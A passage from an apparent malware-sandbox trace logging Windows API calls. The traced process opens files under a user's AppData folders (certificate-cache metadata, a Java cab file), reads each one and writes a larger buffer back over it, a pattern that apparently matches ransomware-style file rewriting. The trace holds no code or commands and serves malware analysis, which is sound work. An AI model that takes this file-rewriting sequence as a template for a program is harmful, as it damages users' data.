lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x359f2bc*=0x194, lpOverlapped=0x0) returned 1 [0174.334] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0174.334] WriteFile (in: hFile=0x210, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x71c, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x359f2d0*=0x71c, lpOverlapped=0x0) returned 1 [0174.334] CloseHandle (hObject=0x210) returned 1 [0174.334] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.335] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.335] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x194 [0174.335] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.335] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.335] ReleaseMutex (hMutex=0x168) returned 1 [0174.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpUsedDefaultChar=0x0) returned 65 [0174.335] ReadFile (in: hFile=0x210, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x359f2bc*=0x194, lpOverlapped=0x0) returned 1 [0174.336] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0174.336] WriteFile (in: hFile=0x210, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x71c, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x359f2d0*=0x71c, lpOverlapped=0x0) returned 1 [0174.336] CloseHandle (hObject=0x210) returned 1 [0174.336] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.337] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.337] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x194 [0174.337] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.337] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.337] ReleaseMutex (hMutex=0x168) returned 1 [0174.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpUsedDefaultChar=0x0) returned 65 [0174.337] ReadFile (in: hFile=0x210, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x359f2bc*=0x194, lpOverlapped=0x0) returned 1 [0174.338] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0174.338] WriteFile (in: hFile=0x210, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x71c, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x359f2d0*=0x71c, lpOverlapped=0x0) returned 1 [0174.339] CloseHandle (hObject=0x210) returned 1 [0174.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0174.339] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.339] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x182 [0174.339] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0174.339] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.340] ReleaseMutex (hMutex=0x168) returned 1 [0174.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0174.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cchWideChar=65, lpMultiByteStr=0x1faca7c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpUsedDefaultChar=0x0) returned 65 [0174.340] ReadFile (in: hFile=0x210, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x359f2bc*=0x182, lpOverlapped=0x0) returned 1 [0174.341] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0174.341] WriteFile (in: hFile=0x210, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x70a, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x359f2d0*=0x70a, lpOverlapped=0x0) returned 1 [0174.341] CloseHandle (hObject=0x210) returned 1 [0174.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0175.179] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0175.180] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x196 [0175.180] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0175.180] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.180] ReleaseMutex (hMutex=0x168) returned 1 [0175.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0175.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cchWideChar=65, lpMultiByteStr=0x1fac86c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpUsedDefaultChar=0x0) returned 65 [0175.180] ReadFile (in: hFile=0x1d8, lpBuffer=0x25af228, nNumberOfBytesToRead=0x196, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x359f2bc*=0x196, lpOverlapped=0x0) returned 1 [0175.181] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0175.181] WriteFile (in: hFile=0x1d8, lpBuffer=0x2842988*, nNumberOfBytesToWrite=0x71e, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2842988*, lpNumberOfBytesWritten=0x359f2d0*=0x71e, lpOverlapped=0x0) returned 1 [0175.181] CloseHandle (hObject=0x1d8) returned 1 [0175.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0175.182] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0175.182] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1a0 [0175.182] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0175.182] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.182] ReleaseMutex (hMutex=0x168) returned 1 [0175.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0175.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cchWideChar=65, lpMultiByteStr=0x1fac86c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpUsedDefaultChar=0x0) returned 65 [0175.183] ReadFile (in: hFile=0x1d8, lpBuffer=0x25af228, nNumberOfBytesToRead=0x1a0, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x359f2bc*=0x1a0, lpOverlapped=0x0) returned 1 [0175.184] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0175.184] WriteFile (in: hFile=0x1d8, lpBuffer=0x2842988*, nNumberOfBytesToWrite=0x728, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2842988*, lpNumberOfBytesWritten=0x359f2d0*=0x728, lpOverlapped=0x0) returned 1 [0175.184] CloseHandle (hObject=0x1d8) returned 1 [0175.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0175.185] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0175.185] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x198 [0175.186] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0175.186] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.186] ReleaseMutex (hMutex=0x168) returned 1 [0175.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0175.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cchWideChar=65, lpMultiByteStr=0x1fac86c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpUsedDefaultChar=0x0) returned 65 [0175.186] ReadFile (in: hFile=0x1d8, lpBuffer=0x25af228, nNumberOfBytesToRead=0x198, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25af228*, lpNumberOfBytesRead=0x359f2bc*=0x198, lpOverlapped=0x0) returned 1 [0175.188] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0175.188] WriteFile (in: hFile=0x1d8, lpBuffer=0x2842988*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2842988*, lpNumberOfBytesWritten=0x359f2d0*=0x720, lpOverlapped=0x0) returned 1 [0175.188] CloseHandle (hObject=0x1d8) returned 1 [0175.188] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0175.189] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0175.189] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x182ac2a [0175.189] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0175.190] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0175.190] ReleaseMutex (hMutex=0x168) returned 1 [0175.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Data1.cab", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0175.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Data1.cab", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Data1.cab", lpUsedDefaultChar=0x0) returned 9 [0175.190] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0175.193] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0175.203] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0175.205] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0175.206] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0175.209] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0175.210] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ef20000 [0175.221] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0175.223] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7ef80000, AllocationBase=0x7ef80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.223] VirtualAlloc (lpAddress=0x0, dwSize=0x80000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eea0000 [0175.801] VirtualFree (lpAddress=0x7ef20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.805] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0176.008] ReadFile (in: hFile=0x1d8, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0176.009] VirtualQuery (in: lpAddress=0x7ef20000, lpBuffer=0x359f23c, dwLength=0x1c | out: lpBuffer=0x359f23c*(BaseAddress=0x7ef20000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0176.009] VirtualAlloc (lpAddress=0x7ef20000, dwSize=0x20000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ef20000 [0176.009] VirtualAlloc (lpAddress=0x7ef20000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ef20000 [0176.011] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1828c2a [0176.011] ReadFile (in: hFile=0x1d8, lpBuffer=0x2664c68, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2664c68*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0176.065] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1828c2a [0176.067] VirtualAlloc (lpAddress=0x0, dwSize=0x70000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ee30000 [0176.078] VirtualQuery (in: lpAddress=0x7eea0000, lpBuffer=0x359f258, dwLength=0x1c | out: lpBuffer=0x359f258*(BaseAddress=0x7eea0000, AllocationBase=0x7eea0000, AllocationProtect=0x4, RegionSize=0x80000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.078] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eda0000 [0176.087] VirtualQuery (in: lpAddress=0x7eea0000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7eea0000, AllocationBase=0x7eea0000, AllocationProtect=0x4, RegionSize=0x80000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.087] VirtualFree (lpAddress=0x7eea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.090] VirtualQuery (in: lpAddress=0x7ef20000, lpBuffer=0x359f2b0, dwLength=0x1c | out: lpBuffer=0x359f2b0*(BaseAddress=0x7ef20000, AllocationBase=0x7ef20000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.090] VirtualFree (lpAddress=0x7ef20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0177.250] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0177.251] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.251] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0177.252] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0177.252] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0177.253] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0177.253] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x359f28c*=0xf000, 